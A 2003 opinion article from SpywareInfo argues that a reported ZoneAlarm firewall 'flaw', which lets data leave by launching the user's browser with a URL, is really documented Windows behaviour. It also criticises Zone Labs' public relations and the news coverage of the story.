By: Mike Healan
July 8, 2003
If you pay any attention to news about software or PC security, you've no doubt heard of a severe flaw discovered recently in the popular ZoneAlarm personal firewall. You may have heard that Zone Labs initially refused to fix this flaw in the free version of their software, saying that users would need to upgrade to the expensive Pro version to fix this issue. You may also have heard that Zone Labs has back pedaled and decided to address the issue after all.
Here is something that you may not have heard. Most of that is not true. Zone Labs is not telling people to upgrade to the pro version to fix this flaw. In fact, there is no flaw to be fixed.
This all started when someone posted a hypothetical password theft exploit to Bugtraq. In his hypothetical exploit, the person speaks of a rogue application stealing the user's passwords or credit card information. This application sends a command to Windows to start the user's web browser and load an internet address. In the poster's example, the rogue application sends the information that it had stolen as part of the request to the server. The person claimed that this constituted a bug in the core design of ZoneAlarm that allows software to bypass it and access the internet.
In fact, all the person had found was a feature of Windows that is commonly known and well documented. If a program gives the Windows shell a command, and the command starts with http://, Windows determines correctly that the program wants the user's web browser to load a web page. Windows checks the registry to see which web browser the user has configured to handle web surfing, then loads the web page in that browser. If the user has set their firewall to allow their web browser to access the internet, then obviously there will be no alert.
This is not a flaw in ZoneAlarm by any conceivable stretch of the imagination. Does Zone Labs write Windows? No, Microsoft does, and yet ZoneAlarm has been singled out as being responsible for this issue.
This should never have been considered to be a ZoneAlarm problem. As a matter of fact, this shouldn't be considered to be a firewall problem at all. If you have an application stealing your passwords and trying to send them to a remote server, you should be looking your antivirus maker in the eye and asking why his software didn't catch the trojan.
To put this into simple terms, let's say that someone mugs you outside a shopping mall and steals your car. Do you blame the parking lot attendant for letting the mugger drive out with your car without realizing he shouldn't be driving it? Or do you blame mall security for not protecting you from the mugger in the first place?
The story about this so-called flaw was published by The Register, and suddenly it was news all over the internet. It became even bigger news when Zone Labs stated that they wouldn't fix it. Why should they? It is a feature of Windows that had nothing to do with their firewall. At that point, it ceased being news and became a controversy. And then, the ill-considered words of a Zone Labs executive turned it into a scandal.
This executive, Fred Felman, vice-president of products, made the very poor decision to point out to a reporter that users running the expensive professional version of ZoneAlarm were protected from this hypothetical attack by an enhanced feature not available in the free version.
Predictably, the article at ExtremeTech in which this statement was published had this as its headline:
Zone Labs Won't Fix Hole In Free Firewall
Zone Labs: Vulnerability Tied To Windows; Firm Urges Upgrade To Paid Products
Thus began the misinformed tirades against Zone Labs on discussion groups worldwide. "They are withholding the patch to force you to buy the upgrade!" is how these discussions went for the most part.
I believe that it was very poor judgement for Felman to tell a reporter that the free version wouldn't be updated to deal with the issue, then later saying that the professional version does deal with it. To say something like that to a reporter was beyond foolish.
I don't believe that Zone Labs intended to use the threat of a security issue as a marketing ploy to have more of its free users buy the professional version. Felman's statement was "spun" to make it look like Zone Labs was doing just that.
This is not the only recent PR blunder committed by Zone Labs. All versions of ZoneAlarm have a feature that automatically checks for an update to the software. Zone Labs has been known to use that update feature to pitch the pro version to their free users, and many people simply turn it off as a result. A few months ago, Zone Labs removed the option that allows the user to disable update notifications in the free version of the software.
The public was outraged. Many people swore they would remove ZoneAlarm and find another firewall. I published a page on my site saying that SpywareInfo would no longer recommend ZoneAlarm and urged people to write to Zone Labs with their opinion of the situation. Zone Labs quickly reversed its decision and released a new version that included the option. Later, an employee of Zone Labs admitted to me in a letter that they had shot themselves in the foot with that whole situation.
I don't like it when a software company deliberately ignores a security problem. Last year, I and many others condemned Microsoft for doing exactly what Zone Labs has been accused wrongly of doing.
You may remember the infamous Health Center exploit that made headlines just after Service Pack 1 for Windows XP was released. This was a flaw so severe and so easy to exploit that simply clicking on a hyperlink in a web page or in an email could lead to the deletion of your computer's hard drive.
With callous disregard for the security of their users, Microsoft refused to release a patch for this vulnerability, despite having known of it for several months. The only way to fix it, they said, was to install the service pack. Eventually, in the face of all that bad publicity, Microsoft did release a separate patch.
If Zone Labs were guilty of doing that, I'd be condemning them now just as I did months ago over the update situation, and just as I condemned Microsoft last year. However, Zone Labs was framed. This was not a flaw in their software. This was not a hole. This was not a marketing ploy gone wrong.
It was some guy posting a well documented function of Windows to a Bugtraq mailing list described as a "flaw", then laying the blame for the so-called "flaw" on the wrong company. Practically all firewalls will handle this hypothetical "attack" in exactly the same manner as ZoneAlarm. It will allow the web browser access to the internet, just as the user has instructed it to do.
Now, because of misinformed flaming on discussions groups provoked by misleading articles with incorrect information, Zone Labs will release an updated version of the free firewall. The new version will include a feature already present in the Pro version. This feature differentiates between an internet connection request made by the web browser and a connection request made by a third party product that loads in the web browser.
The absence of a feature in the free version that is present in the paid version does not constitute a security hole. It just means that the free version does its job as a firewall with a minimum of bells and whistles, while those who want more options and features can support the company's efforts by purchasing the pro version. ZoneAlarm free does no less a job of denying or allowing access to the computer's ports than the Pro version.
I have noticed that the news sites covering Zone Labs' decision to release the new version have decided to present the news in terms of Zone Labs "fixing a security hole" by releasing a "patch", even though this is not the case. The headline at ExtremeTech reads "Update: Zone Labs Now Says It Will Patch Free Firewall". The Register states that "A vulnerability in Zone Labs' freeware version of ZoneAlarm firewall will be patched within 'the next two weeks'". There are other examples of this at other news sites.
A controversial story is good for a news site. It fires up people's emotions. It makes people talk about it. Those people talk to their friends and post it on message boards. It brings in a lot of readers. And it also makes the logs show a lot of hits on the sponsors' advertisements.
It also does a disservice to the readers of those sites when the information simply isn't true. I've had to learn the hard way to be careful with what I say. When I rant about something, hundreds of thousands of people read it, and it could cause a very real effect on the object of my ranting. Look what happened to InBoxCop recently if you doubt that.
These news sites have considerably more readers than I do, and I don't want to begin to imagine the damage that has been done to Zone Labs' reputation over something that logically cannot be considered to be their fault.
I had incorrect information published about me once, so I know how irritating this can be. One of the owners of Neowin, not understanding the situation about which he was reporting, published misleading statements about myself and my newsletter. After several people posted comments trying to set the facts straight, the article was closed to further comments.
Six months later, that still irritates me.
This article is located at http://www.spywareinfoforum.info/articles/zonelabs/exploit_hoax.php
Comment on this story
Links:
http://www.zonealarm.com/ ZoneAlarm web site
http://www.securityfocus.com/archive/1/326371 Bugtraq posting
http://www.theregister.co.uk/content/55/31481.html The Register's article about the exploit
http://www.extremetech.com/article2/0,3973,1185848,00.asp Zone Labs won't fix the "flaw"
http://www.spywareinfoforum.info/newletter/sep21,2002#xpsp1 SpywareInfo condemns Microsoft
http://www.extremetech.com/article2/0,3973,1179181,00.asp Zone Labs patches ZoneAlarm
http://www.theregister.co.uk/content/55/31605.html Zone Labs patches ZoneAlarm
http://www.spywareinfoforum.info/articles/inboxcop/ InBoxCop article at SpywareInfo
http://www.spywareinfoforum.info/newletter/dec31,2002#ls Misleading statements about SpywareInfo
Zone Labs logo is Copyright © 1999-2003 Zone Labs, Inc. All rights reserved.
